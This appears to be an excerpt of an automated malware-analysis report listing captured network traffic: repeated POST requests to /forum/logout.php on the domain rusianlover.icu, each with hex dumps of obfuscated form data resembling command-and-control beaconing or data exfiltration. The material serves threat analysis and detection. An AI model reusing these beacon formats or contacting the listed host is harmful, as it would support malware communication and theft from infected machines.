37 34 35 37 45 41 45 36 34 44 41 45 37 33 33 32 33 38 33 41 44 43 34 32 34 33 34 42 32 39 46 44 35 41 32 30 37 39 41 31 33 35 38 34 34 37 35 31 43 36 31 38 36 46 43 34 45 33 37 37 34 45 34 46 34 36 44 38 46 44 41 43 41 34 33 37 41 39 33 42 43 32 36 45 44 32 45 43 37 30 44 30 39 43 45 34 36 31 45 41 38 46 45 39 45 35 42 39 34 38 43 33 32 43 30 31 43 32 41 41 43 34 37 44 46 43 43 43 31 41 33 31 45 39 44 31 34 35 39 31 38 44 46 30 39 39 46 46 41 31 46 32 44 41 42 44 35 35 31 33 38 33 31 45 38 33 38 32 41 44 36 44 39 43 42 31 36 32 32 39 37 30 31 35 42 46 36 35 44 31 41 36 35 30 32 44 30 34 32 43 Data Ascii: skia=24DFF2757FC5E2482C62B66E9F2D3ED6704C891E203FEA7DFFB0B862&qgcsieuq=19334356&uooicc=3E67897FB1E9CE214AA672A21B585A4B9247374174FD48E224DE13087DA3DD2EE95CAA5BD170C92197B201A84CA6D61BEE16E8CF3D9B34F55E4C748CEBAC794448CFED93C950B26429F69CA896FD655B870D27B82548A2FD4D7DD22354927676BEC2A06079F28BD32E29D34D5124C7F4B878E2E255538A82EE399A2DFD816FF9B8511C504E6F90433E168A4C64B12EDEDE1221AF94AB5ACC6A0E2326C417729C748926295AACEA4FF4C2F896C0928ECB8ADEAC4094F7ECCC185E76879178EFEB7457EAE64DAE7332383ADC42434B29FD5A2079A135844751C6186FC4E3774E4F46D8FDACA437A93BC26ED2EC70D09CE461EA8FE9E5B948C32C01C2AAC47DFCCC1A31E9D145918DF099FFA1F2DABD5513831E8382AD6D9CB162297015BF65D1A6502D042C
Source: global traffic	HTTP traffic detected: POST /forum/logout.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: rusianlover.icuContent-Length: 672Cache-Control: no-cacheData Raw: 7a 65 6a 69 6e 3d 37 46 43 31 41 31 39 33 36 39 36 35 31 42 38 41 44 37 41 42 33 31 37 33 34 31 32 31 30 38 44 46 42 45 34 43 30 42 33 36 31 46 34 37 34 44 37 45 37 43 35 45 36 44 26 78 61 64 61 64 67 6a 67 6a 3d 37 39 36 34 32 34 36 39 26 62 69 70 71 78 65 6c 3d 42 38 41 38 37 39 39 39 42 46 37 44 41 43 45 43 45 36 46 39 46 34 45 36 34 44 46 42 32 34 33 35 46 34 38 37 42 43 44 32 33 34 42 30 46 30 33 46 30 30 32 36 36 31 31 33 41 31 43 32 41 34 46 41 37 36 36 38 37 45 36 33 41 42 32 44 38 30 38 45 41 30 34 43 42 38 44 42 37 30 38 45 30 42 38 42 42 33 33 31 32 38 41 37 34 33 43 38 32 34 43 41 42 39 35 34 42 37 34 36 41 35 45 42 42 39 38 44 35 43 36 36 35 41 34 35 36 46 34 33 45 34 43 43 30 39 32 33 39 34 33 36 46 32 31 42 42 37 37 37 45 33 42 42 33 39 37 43 38 42 33 41 46 34 32 35 39 43 46 35 34 43 32 33 32 43 33 43 43 36 45 39 35 45 32 36 38 46 43 46 37 30 38 44 32 34 36 34 43 37 33 34 34 30 35 33 42 39 45 46 46 42 38 34 33 41 44 34 43 38 39 44 32 41 41 34 34 38 39 30 46 32 30 41 31 32 46 35 37 46 38 30 36 36 41 43 31 41 43 45 38 38 35 44 41 39 41 41 35 38 38 33 31 36 30 31 37 30 31 43 35 38 36 35 43 30 30 30 46 34 36 44 42 45 31 39 33 33 46 38 36 44 34 34 37 36 42 33 39 36 44 43 43 34 41 37 32 43 36 35 30 44 32 44 32 36 36 39 33 46 41 33 31 32 45 38 33 44 30 30 34 44 39 34 44 36 38 42 38 32 37 31 41 38 33 45 41 32 42 39 35 37 45 34 45 38 38 31 39 32 46 30 41 39 44 37 33 34 34 34 30 31 30 46 43 37 38 36 31 44 31 42 44 42 38 39 36 36 32 31 41 35 41 42 42 41 45 38 30 32 36 34 35 44 37 32 44 35 32 41 36 42 46 39 41 37 38 43 33 37 37 42 32 38 37 35 45 31 45 37 31 34 33 32 43 45 36 45 37 39 46 42 46 43 42 35 39 33 44 32 33 44 46 31 36 30 37 35 41 38 46 43 41 45 41 38 34 36 42 35 41 33 45 41 39 38 35 44 32 43 32 46 37 41 34 45 42 37 45 35 36 35 41 33 41 46 45 46 45 46 30 36 35 36 37 32 30 35 41 31 41 39 39 42 30 31 43 30 43 42 43 43 30 46 44 43 37 43 38 36 46 46 46 32 39 37 37 45 39 37 30 45 46 43 31 42 34 33 41 30 32 32 45 37 46 45 41 45 41 31 30 31 44 42 43 30 41 33 39 45 39 41 35 43 Data Ascii: zejin=7FC1A19369651B8AD7AB3173412108DFBE4C0B361F474D7E7C5E6D&xadadgjgj=79642469&bipqxel=B8A87999BF7DACECE6F9F4E64DFB2435F487BCD234B0F03F00266113A1C2A4FA76687E63AB2D808EA04CB8DB708E0B8BB33128A743C824CAB954B746A5EBB98D5C665A456F43E4CC09239436F21BB777E3BB397C8B3AF4259CF54C232C3CC6E95E268FCF708D2464C7344053B9EFFB843AD4C89D2AA44890F20A12F57F8066AC1ACE885DA9AA58831601701C5865C000F46DBE1933F86D4476B396DCC4A72C650D2D26693FA312E83D004D94D68B8271A83EA2B957E4E88192F0A9D73444010FC7861D1BDB896621A5ABBAE802645D72D52A6BF9A78C377B2875E1E71432CE6E79FBFCB593D23DF16075A8FCAEA846B5A3EA985D2C2F7A4EB7E565A3AFEFEF06567205A1A99B01C0CBCC0FDC7C86FFF2977E970EFC1B43A022E7FEAEA101DBC0A39E9A5C
Source: global traffic	HTTP traffic detected: POST /forum/logout.php?id=1106076 HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: rusianlover.icuContent-Length: 637Cache-Control: no-cacheData Raw: 73 71 6f 6d 6b 69 3d 38 65 30 62 38 33 64 33 35 62 64 38 32 35 61 65 32 66 37 34 37 33 26 71 6d 69 65 3d 37 38 31 33 37 37 33 36 26 75 75 75 75 75 75 75 75 3d 37 63 66 65 66 38 62 64 62 34 38 66 63 37 32 32 61 34 61 30 65 31 38 33 30 62 36 64 38 34 63 62 66 31 36 61 62 37 66 63 66 37 36 61 61 64 38 37 35 39 61 30 61 38 61 31 32 34 30 37 35 32 38 37 66 34 62 36 32 38 33 35 62 31 62 30 64 66 33 61 63 64 65 34 66 33 63 65 38 30 38 66 65 36 34 30 38 39 64 33 36 34 32 62 38 39 65 66 63 32 38 37 30 61 37 33 61 38 30 31 63 31 37 64 36 30 32 37 61 65 35 65 33 31 30 63 64 63 33 39 64 64 61 62 35 65 62 32 62 38 64 62 34 65 31 65 30 37 32 64 39 33 38 66 36 30 35 64 66 31 32 65 61 65 38 38 30 36 37 63 62 37 34 30 62 30 32 61 66 31 64 39 61 64 65 38 34 62 36 35 34 66 64 38 63 34 35 33 64 35 38 61 37 37 39 32 38 64 31 30 63 63 37 39 36 36 64 37 66 31 36 33 31 37 36 32 65 66 65 36 63 31 64 35 66 66 35 32 37 63 31 31 65 63 37 30 65 36 33 65 39 37 38 30 37 39 66 37 66 30 30 36 37 35 66 36 38 38 61 66 65 62 65 61 64 30 39 66 31 30 37 65 66 39 32 32 34 61 65 30 37 33 38 66 35 37 37 66 64 63 31 37 33 65 37 64 32 33 37 61 65 39 37 32 65 65 38 31 66 62 39 39 33 30 65 64 35 65 62 33 66 33 63 33 65 66 65 65 65 38 34 34 62 33 66 39 38 65 61 65 66 39 35 37 39 62 35 62 33 64 35 39 37 64 33 37 66 37 31 38 32 64 38 62 32 32 66 32 31 36 30 38 34 37 37 34 65 39 35 34 62 34 37 34 31 32 62 38 33 34 61 34 64 30 62 31 63 35 34 38 32 62 30 66 39 38 38 36 65 30 31 39 30 36 30 33 32 30 38 39 63 63 61 62 39 31 65 63 35 62 33 66 31 38 66 37 63 38 65 34 63 37 32 35 64 33 65 31 62 33 38 63 32 39 63 39 66 63 33 35 66 39 35 65 65 63 36 32 35 64 62 39 38 30 65 61 35 31 63 64 37 64 64 38 39 34 33 30 37 61 62 63 32 34 62 32 66 30 32 62 39 36 63 65 39 36 66 36 37 64 61 62 31 61 39 61 37 61 65 36 35 31 32 33 64 63 33 66 31 32 66 32 38 35 30 30 61 36 30 38 62 62 30 35 63 38 38 30 35 38 30 37 37 36 36 66 63 30 63 39 37 35 38 30 Data Ascii: sqomki=8e0b83d35bd825ae2f7473&qmie=78137736&uuuuuuuu=7cfef8bdb48fc722a4a0e1830b6d84cbf16ab7fcf76aad8759a0a8a124075287f4b62835b1b0df3acde4f3ce808fe64089d3642b89efc2870a73a801c17d6027ae5e310cdc39ddab5eb2b8db4e1e072d938f605df12eae88067cb740b02af1d9ade84b654fd8c453d58a77928d10cc7966d7f1631762efe6c1d5ff527c11ec70e63e978079f7f00675f688afebead09f107ef9224ae0738f577fdc173e7d237ae972ee81fb9930ed5eb3f3c3efeee844b3f98eaef9579b5b3d597d37f7182d8b22f216084774e954b47412b834a4d0b1c5482b0f9886e01906032089ccab91ec5b3f18f7c8e4c725d3e1b38c29c9fc35f95eec625db980ea51cd7dd894307abc24b2f02b96ce96f67dab1a9a7ae65123dc3f12f28500a608bb05c8805807766fc0c97580
Source: global traffic	HTTP traffic detected: POST /forum/logout.php?id=3125771 HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: rusianlover.icuContent-Length: 665Cache-Control: no-cacheData Raw: 77 73 6f 6b 6d 69 3d 33 38 34 31 31 32 46 42 38 43 45 30 39 35 42 34 45 46 37 34 44 46 35 33 32 43 37 46 45 35 34 41 44 42 30 30 33 38 34 31 42 38 37 38 34 42 44 35 41 34 26 75 6f 69 63 3d 39 34 35 34 33 34 37 36 26 79 77 75 73 77 75 73 71 3d 34 37 44 39 45 31 39 44 31 39 42 43 30 37 45 33 42 43 41 30 42 41 37 31 39 42 31 42 45 30 46 32 31 45 43 36 33 33 31 30 34 30 46 39 38 46 43 46 32 34 30 42 33 34 46 46 38 30 36 44 34 43 37 39 36 31 31 35 33 34 45 43 41 36 41 35 39 44 46 33 39 34 33 39 46 41 46 38 45 42 31 33 34 41 32 33 37 32 42 42 37 43 30 33 30 32 41 37 38 33 32 42 37 42 42 43 45 32 38 42 35 36 39 37 38 30 39 44 30 37 31 35 35 33 44 31 35 36 45 39 36 44 42 42 45 32 38 46 39 35 42 30 30 45 35 41 41 43 30 32 43 39 38 35 41 30 35 33 34 33 41 34 44 35 36 33 36 43 32 35 37 35 38 43 42 31 38 38 36 34 43 35 38 44 38 33 42 43 33 46 34 33 45 38 33 39 32 38 32 41 38 42 45 46 45 37 46 37 36 31 46 34 41 37 36 43 38 42 42 33 36 42 35 30 37 34 36 46 31 39 31 30 36 37 39 39 46 30 30 32 30 36 46 38 31 33 36 36 32 33 36 37 33 43 31 45 44 38 43 43 41 45 35 45 39 37 34 39 39 32 33 31 46 30 31 37 45 45 44 36 45 34 34 43 43 36 31 34 44 34 42 43 35 34 32 43 39 32 45 37 35 32 41 31 32 44 43 46 32 35 36 41 42 38 30 39 31 32 44 39 32 38 42 37 43 42 41 36 31 32 31 39 38 31 38 41 30 46 34 31 35 39 42 32 44 44 32 34 42 43 46 39 41 39 36 37 43 44 39 45 36 37 36 45 43 39 46 31 34 46 41 46 38 32 35 46 31 45 45 37 42 45 39 46 36 46 44 45 44 32 38 43 37 35 34 31 30 31 34 34 32 32 37 32 37 31 46 30 31 31 35 33 43 41 30 44 45 31 31 43 39 32 46 45 46 33 34 35 46 42 42 41 37 44 35 46 46 39 35 34 43 33 45 45 34 38 33 33 43 34 42 30 45 45 36 38 39 32 45 38 41 33 32 43 46 31 39 44 38 31 36 45 30 36 34 45 44 30 46 43 36 42 36 36 39 32 45 45 35 37 46 33 43 35 45 30 32 36 43 31 34 43 34 42 45 37 32 31 46 43 37 37 41 32 39 39 35 42 42 33 31 39 34 39 35 31 33 45 37 42 41 36 43 34 31 34 35 34 30 43 37 32 41 31 43 30 38 34 41 39 33 31 39 35 31 42 33 39 45 46 38 33 30 42 35 31 37 35 38 46 42 30 41 33 Data Ascii: wsokmi=384112FB8CE095B4EF74DF532C7FE54ADB003841B8784BD5A4&uoic=94543476&ywuswusq=47D9E19D19BC07E3BCA0BA719B1BE0F21EC6331040F98FCF240B34FF806D4C79611534ECA6A59DF39439FAF8EB134A2372BB7C0302A7832B7BBCE28B5697809D071553D156E96DBBE28F95B00E5AAC02C985A05343A4D5636C25758CB18864C58D83BC3F43E839282A8BEFE7F761F4A76C8BB36B50746F19106799F00206F8136623673C1ED8CCAE5E97499231F017EED6E44CC614D4BC542C92E752A12DCF256AB80912D928B7CBA61219818A0F4159B2DD24BCF9A967CD9E676EC9F14FAF825F1EE7BE9F6FDED28C75410144227271F01153CA0DE11C92FEF345FBBA7D5FF954C3EE4833C4B0EE6892E8A32CF19D816E064ED0FC6B6692EE57F3C5E026C14C4BE721FC77A2995BB31949513E7BA6C414540C72A1C084A931951B39EF830B51758FB0A3
Source: global traffic	HTTP traffic detected: POST /forum/logout.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: rusianlover.icuContent-Length: 653Cache-Control: no-cacheData Raw: 6b 75 6b 75 3d 66 62 62 64 62 66 30 36 33 35 66 39 31 37 30 36 63 30 34 63 39 33 39 30 39 38 32 66 33 64 37 35 63 33 64 64 64 66 26 69 71 65 6d 61 69 77 65 3d 32 33 38 30 34 38 34 32 26 6d 79 71 63 75 67 3d 44 42 39 43 37 33 36 30 33 37 45 37 35 44 35 45 43 41 39 41 33 37 42 42 45 45 34 42 39 39 44 46 30 46 42 38 44 42 31 32 38 34 45 30 45 44 32 34 36 39 32 41 42 41 39 30 33 46 31 31 44 31 45 39 31 32 39 33 36 33 35 37 44 30 30 36 38 45 31 38 36 41 44 37 39 35 39 46 35 30 31 34 31 33 43 30 42 36 36 42 45 32 45 39 35 37 35 35 43 37 31 44 42 45 35 34 41 32 43 33 41 30 38 33 32 36 42 37 33 34 38 33 38 37 33 44 34 36 43 38 41 38 30 38 42 41 36 39 30 33 33 43 35 42 30 38 34 32 44 44 33 35 38 31 38 46 33 36 46 33 43 32 33 35 43 42 34 32 44 34 31 36 41 43 35 34 35 44 46 31 45 34 34 43 34 31 42 31 38 32 43 44 31 44 33 35 30 35 36 32 37 43 35 46 35 45 32 37 37 42 33 37 38 42 39 38 41 37 46 30 33 39 33 30 44 34 39 37 46 33 38 41 45 43 31 30 46 38 36 33 44 39 34 39 34 46 43 42 39 31 44 37 34 33 35 44 44 39 44 37 44 42 46 33 30 34 44 35 37 31 30 30 33 32 38 30 43 32 38 37 41 46 36 45 45 36 38 42 36 45 42 36 35 45 31 37 42 32 41 45 45 30 35 33 35 38 35 42 42 33 39 31 35 37 34 36 42 32 46 34 37 41 31 38 33 44 39 44 31 41 43 45 44 33 30 42 30 39 36 31 37 39 38 43 46 41 32 37 30 45 39 30 46 35 33 37 42 39 31 35 35 39 36 32 44 43 35 43 45 42 33 46 41 32 32 33 33 33 39 38 37 33 34 39 33 44 38 34 42 46 35 33 33 45 41 46 34 45 33 33 34 37 30 39 38 38 38 38 38 43 43 32 32 45 31 46 41 32 41 46 38 35 39 42 38 31 37 41 44 41 37 41 37 43 34 39 37 33 30 41 42 30 30 42 30 46 31 45 43 38 36 33 31 41 42 43 44 41 38 46 45 36 32 36 46 30 42 42 30 37 36 36 45 44 38 39 45 41 38 34 32 41 46 33 31 42 36 36 37 34 31 43 37 44 44 33 39 42 45 46 31 33 38 45 37 31 32 32 46 41 30 43 39 41 36 44 36 46 45 44 45 32 34 32 39 46 36 33 38 41 36 39 45 38 44 30 31 42 34 44 41 39 41 33 38 41 32 41 35 41 41 33 35 41 38 30 43 43 30 38 42 32 42 34 36 34 38 34 46 37 37 43 34 44 Data Ascii: kuku=fbbdbf0635f91706c04c9390982f3d75c3dddf&iqemaiwe=23804842&myqcug=DB9C736037E75D5ECA9A37BBEE4B99DF0FB8DB1284E0ED24692ABA903F11D1E912936357D0068E186AD7959F501413C0B66BE2E95755C71DBE54A2C3A08326B73483873D46C8A808BA69033C5B0842DD35818F36F3C235CB42D416AC545DF1E44C41B182CD1D3505627C5F5E277B378B98A7F03930D497F38AEC10F863D9494FCB91D7435DD9D7DBF304D571003280C287AF6EE68B6EB65E17B2AEE053585BB3915746B2F47A183D9D1ACED30B0961798CFA270E90F537B9155962DC5CEB3FA223339873493D84BF533EAF4E33470988888CC22E1FA2AF859B817ADA7A7C49730AB00B0F1EC8631ABCDA8FE626F0BB0766ED89EA842AF31B66741C7DD39BEF138E7122FA0C9A6D6FEDE2429F638A69E8D01B4DA9A38A2A5AA35A80CC08B2B46484F77C4D
Source: global traffic	HTTP traffic detected: POST /forum/logout.php?pid=567 HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: rusianlover.icuContent-Length: 646Cache-Control: no-cacheData Raw: 6c 63 74 6b 62 73 6a 3d 32 32 30 39 31 38 33 35 26 6e 67 7a 73 6c 65 78 71 6a 3d 37 64 30 64 38 35 35 38 38 66 65 66 31 62 66 65 65 61 36 63 64 30 63 34 64 62 36 32 26 70 6b 66 61 76 3d 35 35 31 61 62 31 31 64 63 37 63 33 35 62 61 62 39 35 38 32 33 37 62 61 63 30 39 64 31 66 32 32 66 62 33 33 39 36 61 38 31 34 66 62 38 65 64 64 36 65 66 32 62 34 38 34 61 64 30 61 37 32 37 39 34 33 36 32 31 62 34 38 61 66 36 39 34 32 61 30 35 35 61 37 39 38 63 62 36 36 61 33 63 61 34 38 33 63 63 64 65 30 32 37 31 66 32 36 35 62 38 64 33 38 61 64 30 31 33 32 39 66 39 38 63 39 30 30 36 33 32 30 65 32 30 32 39 32 32 30 66 63 62 38 36 61 38 66 61 33 36 37 39 34 62 33 65 33 39 36 31 65 35 61 33 34 39 65 31 35 63 63 39 33 62 35 31 34 30 34 62 31 32 65 39 37 33 62 38 32 36 32 64 33 66 38 37 65 35 34 34 39 35 35 63 35 38 32 64 32 36 32 33 66 33 31 39 34 39 34 65 39 31 30 63 37 38 30 32 38 38 62 36 64 61 39 34 35 39 37 66 65 39 37 31 33 33 38 65 31 33 63 66 31 35 65 66 31 34 35 34 37 34 62 65 64 35 33 39 33 31 66 35 63 33 30 66 34 38 62 38 34 64 35 62 35 34 61 64 35 38 33 37 32 63 36 32 37 64 65 34 62 61 31 62 36 39 37 30 36 65 31 64 39 38 35 34 31 38 38 33 64 30 38 33 32 34 33 30 33 65 66 35 31 32 31 63 36 38 63 30 33 39 62 36 30 34 34 38 37 37 38 37 31 39 66 32 37 65 37 64 64 34 38 38 31 63 63 32 31 62 32 31 30 30 35 37 62 36 36 36 34 65 36 37 32 33 66 33 65 32 37 66 36 35 31 31 33 36 38 35 65 33 32 31 64 66 30 66 31 62 32 30 63 62 63 61 32 32 36 35 62 35 31 36 32 63 64 61 62 37 33 37 61 39 33 34 64 36 35 39 39 32 36 34 31 37 37 31 62 39 65 61 65 64 65 31 66 61 35 39 37 64 39 32 35 30 32 37 37 31 30 62 33 38 38 37 64 35 31 35 37 38 39 31 62 62 31 31 36 36 39 37 39 66 31 61 65 36 34 62 36 38 35 35 65 35 64 32 63 36 65 36 38 39 62 63 64 34 66 62 39 35 64 37 34 33 65 32 61 64 61 65 66 35 63 34 62 39 62 65 62 34 32 66 34 35 33 65 37 30 35 65 63 35 62 39 31 32 34 62 31 31 62 35 30 38 30 31 61 65 32 64 36 33 65 65 34 62 31 64 39 32 34 Data Ascii: lctkbsj=22091835&ngzslexqj=7d0d85588fef1bfeea6cd0c4db62&pkfav=551ab11dc7c35bab958237bac09d1f22fb3396a814fb8edd6ef2b484ad0a727943621b48af6942a055a798cb66a3ca483ccde0271f265b8d38ad01329f98c9006320e2029220fcb86a8fa36794b3e3961e5a349e15cc93b51404b12e973b8262d3f87e544955c582d2623f319494e910c780288b6da94597fe971338e13cf15ef145474bed53931f5c30f48b84d5b54ad58372c627de4ba1b69706e1d98541883d08324303ef5121c68c039b60448778719f27e7dd4881cc21b210057b6664e6723f3e27f65113685e321df0f1b20cbca2265b5162cdab737a934d65992641771b9eaede1fa597d925027710b3887d5157891bb1166979f1ae64b6855e5d2c6e689bcd4fb95d743e2adaef5c4b9beb42f453e705ec5b9124b11b50801ae2d63ee4b1d924
Source: global traffic	HTTP traffic detected: POST /forum/logout.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: rusianlover.icuContent-Length: 672Cache-Control: no-cacheData Raw: 7a 65 64 69 68 6d 6c 71 70 3d 32 34 36 32 31 31 39 37 26 62 69 6a 71 72 3d 31 63 36 35 36 38 63 30 62 35 62 65 38 31 35 38 35 61 34 66 61 64 38 65 35 38 39 38 33 63 63 66 36 34 38 32 35 30 62 30 66 33 33 32 34 64 33 61 35 31 62 31 34 38 26 64 6d 70 79 62 6b 6e 3d 31 34 36 32 34 41 34 39 41 41 33 45 44 43 37 46 32 44 41 34 37 39 35 33 37 30 46 35 38 33 39 39 35 43 46 44 38 33 35 31 41 45 30 41 35 31 43 37 33 30 38 43 34 36 46 41 34 37 32 34 41 34 38 30 32 46 42 31 46 32 42 34 46 42 39 46 35 42 31 44 35 34 45 45 45 34 39 41 44 42 43 30 31 36 45 31 30 46 30 45 32 45 37 36 43 45 39 32 45 39 46 46 42 45 38 31 33 39 36 37 43 43 34 34 32 41 39 42 39 46 30 37 32 44 36 38 32 38 39 45 44 45 44 35 39 35 39 32 43 32 38 31 34 37 43 33 39 44 32 41 34 37 30 37 37 30 46 45 30 30 35 44 39 33 34 32 30 35 34 37 35 37 42 38 44 31 35 42 35 34 46 42 37 41 43 45 37 43 43 35 33 38 32 35 46 31 32 38 35 35 41 45 46 34 32 38 35 44 34 39 35 45 44 35 38 45 39 44 39 33 45 38 30 42 36 35 41 32 39 31 35 43 36 34 33 39 33 32 33 46 32 42 45 32 43 32 33 45 44 39 38 32 30 35 34 33 46 39 31 43 44 45 30 34 37 31 44 43 37 37 34 34 39 43 39 44 31 36 44 34 35 36 46 42 32 30 46 39 42 44 37 34 41 44 31 39 35 35 31 37 31 39 46 33 31 45 46 44 31 30 33 32 42 32 38 36 38 31 46 37 46 46 42 33 41 36 34 30 42 30 37 42 33 43 45 30 33 37 31 41 42 43 35 30 38 38 30 46 39 31 41 46 41 32 39 36 32 32 44 31 44 43 36 45 38 41 36 39 38 34 36 39 37 30 45 37 35 37 30 45 39 42 46 32 33 38 33 33 37 32 45 41 45 43 36 32 35 35 44 35 45 31 43 39 35 45 44 45 42 32 31 38 39 45 36 35 33 32 35 32 45 41 31 41 30 33 42 45 31 37 30 32 36 31 45 39 41 37 32 33 34 35 41 31 35 43 31 32 46 42 38 36 44 36 38 31 31 42 35 46 31 43 33 33 37 46 34 42 44 41 41 43 37 39 42 42 41 42 41 46 32 35 41 37 33 43 43 44 32 42 38 44 38 31 42 30 34 43 38 33 44 34 38 34 35 41 41 31 45 45 44 42 30 41 38 36 46 37 41 37 38 39 36 32 30 34 44 33 32 37 32 34 30 46 36 32 41 43 43 35 35 35 34 43 36 35 37 43 32 36 31 41 45 42 43 45 34 42 43 41 45 33 30 41 30 34 36 36 37 34 45 44 44 34 Data Ascii: zedihmlqp=24621197&bijqr=1c6568c0b5be81585a4fad8e58983ccf648250b0f3324d3a51b148&dmpybkn=14624A49AA3EDC7F2DA4795370F583995CFD8351AE0A51C7308C46FA4724A4802FB1F2B4FB9F5B1D54EEE49ADBC016E10F0E2E76CE92E9FFBE813967CC442A9B9F072D68289EDED59592C28147C39D2A470770FE005D9342054757B8D15B54FB7ACE7CC53825F12855AEF4285D495ED58E9D93E80B65A2915C6439323F2BE2C23ED9820543F91CDE0471DC77449C9D16D456FB20F9BD74AD19551719F31EFD1032B28681F7FFB3A640B07B3CE0371ABC50880F91AFA29622D1DC6E8A69846970E7570E9BF2383372EAEC6255D5E1C95EDEB2189E653252EA1A03BE170261E9A72345A15C12FB86D6811B5F1C337F4BDAAC79BBABAF25A73CCD2B8D81B04C83D4845AA1EEDB0A86F7A7896204D327240F62ACC5554C657C261AEBCE4BCAE30A046674EDD4
Source: global traffic	HTTP traffic detected: POST /forum/logout.php?id=9292886 HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: rusianlover.icuContent-Length: 655Cache-Control: no-cacheData Raw: 66 6b 76 61 66 3d 31 39 36 61 39 66 31 38 32 35 62 30 32 37 39 61 62 66 33 65 35 31 34 64 35 63 31 31 62 37 33 39 65 66 63 36 66 36 26 64 67 70 73 76 65 68 6b 74 3d 38 33 30 36 30 35 37 26 68 6f 62 69 70 63 6a 3d 35 38 66 31 35 33 33 62 63 38 33 66 62 32 38 33 66 65 64 32 34 63 66 37 36 64 65 38 37 62 63 62 65 39 36 36 39 36 62 35 63 30 61 38 34 32 30 63 37 38 37 63 35 30 30 63 34 64 63 63 61 30 62 39 39 66 61 33 30 39 38 63 34 62 32 34 35 61 36 66 30 33 31 66 66 61 38 35 39 31 64 66 64 61 63 37 37 37 61 37 33 30 35 61 61 65 36 66 38 61 39 34 62 66 62 62 62 35 35 62 63 36 32 66 64 65 65 65 35 36 35 33 66 32 37 66 34 63 35 32 66 66 66 31 66 30 33 65 30 64 63 63 38 66 39 34 33 63 35 36 31 39 36 32 30 31 39 32 39 32 37 64 37 63 37 66 31 33 30 33 34 62 33 34 65 63 33 63 34 30 32 31 33 39 35 62 63 33 37 31 65 63 65 64 63 37 65 31 36 61 66 64 65 31 39 35 63 34 35 63 64 63 38 66 64 61 63 34 64 37 61 35 35 32 36 66 65 33 64 63 31 62 64 38 37 65 36 33 61 39 38 66 66 31 32 63 37 32 65 63 38 32 35 65 62 61 39 35 38 35 31 38 62 33 38 31 33 63 38 39 31 63 32 61 39 37 34 34 30 39 35 34 37 62 31 65 62 32 65 32 35 37 37 37 30 63 64 33 36 39 65 64 37 31 34 62 32 63 62 37 33 61 32 34 31 66 34 64 30 62 36 31 65 64 36 34 65 32 33 31 32 34 30 63 38 64 61 66 36 66 33 34 61 65 30 37 32 33 66 64 39 36 63 61 39 38 31 39 39 64 31 64 62 30 34 30 35 35 35 66 31 66 66 33 63 63 37 65 34 35 61 38 63 39 64 33 33 31 66 34 32 39 64 39 31 39 63 64 65 30 37 62 34 66 32 31 61 35 63 64 31 34 66 37 61 36 38 35 31 39 32 63 37 38 64 37 38 63 37 37 63 35 38 66 66 34 30 61 33 62 34 38 32 36 34 36 37 61 66 34 63 36 33 32 37 38 65 37 63 32 61 39 34 37 30 63 61 30 66 37 30 38 36 34 37 34 39 65 61 38 66 66 35 32 32 33 66 32 36 62 64 62 65 63 32 64 39 65 30 34 33 61 32 30 37 36 62 66 62 61 35 38 65 35 32 63 36 32 32 33 39 61 65 32 32 63 61 61 30 34 39 32 35 64 31 38 36 37 33 35 31 63 37 37 35 30 33 65 34 33 32 34 37 34 33 31 34 64 32 36 30 63 39 32 62 34 65 30 62 63 37 61 39 33 Data Ascii: fkvaf=196a9f1825b0279abf3e514d5c11b739efc6f6&dgpsvehkt=8306057&hobipcj=58f1533bc83fb283fed24cf76de87bcbe96696b5c0a8420c787c500c4dcca0b99fa3098c4b245a6f031ffa8591dfdac777a7305aae6f8a94bfbbb55bc62fdeee5653f27f4c52fff1f03e0dcc8f943c5619620192927d7c7f13034b34ec3c4021395bc371ecedc7e16afde195c45cdc8fdac4d7a5526fe3dc1bd87e63a98ff12c72ec825eba958518b3813c891c2a974409547b1eb2e257770cd369ed714b2cb73a241f4d0b61ed64e231240c8daf6f34ae0723fd96ca98199d1db040555f1ff3cc7e45a8c9d331f429d919cde07b4f21a5cd14f7a685192c78d78c77c58ff40a3b4826467af4c63278e7c2a9470ca0f70864749ea8ff5223f26bdbec2d9e043a2076bfba58e52c62239ae22caa04925d1867351c77503e432474314d260c92b4e0bc7a93
Source: global traffic	HTTP traffic detected: POST /forum/logout.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: rusianlover.icuContent-Length: 641Cache-Control: no-cacheData Raw: 73 6b 63 75 3d 61 66 39 61 30 30 39 64 31 31 32 38 31 65 65 61 39 30 32 32 39 33 64 36 39 31 26 71 67 77 6d 63 73 69 79 3d 39 38 31 31 38 34 30 36 26 75 6f 69 63 77 71 3d 34 62 65 36 34 38 66 30 36 62 33 64 31 62 36 37 30 30 35 39 38 32 39 66 63 37 32 38 64 66 35 63 65 65 63 33 31 63 31 37 35 64 65 61 63 33 31 32 37 66 39 38 65 39 63 62 30 61 36 30 65 32 36 66 36 63 36 63 31 38 38 34 33 39 35 39 31 32 61 64 38 64 62 32 36 65 62 64 39 31 39 36 30 32 33 64 39 35 62 35 39 64 61 38 62 65 62 38 35 35 62 62 62 30 63 37 30 32 33 32 34 66 37 63 66 65 66 62 66 36 36 65 31 34 65 35 32 62 34 34 37 66 65 36 34 64 62 32 63 64 34 30 36 34 64 34 31 65 39 61 31 61 38 37 39 30 30 66 64 62 62 64 38 33 36 32 61 62 36 62 33 64 39 65 39 65 30 32 36 63 34 30 32 37 37 30 64 61 64 62 65 32 30 35 63 38 61 66 61 65 38 64 36 61 38 31 34 63 66 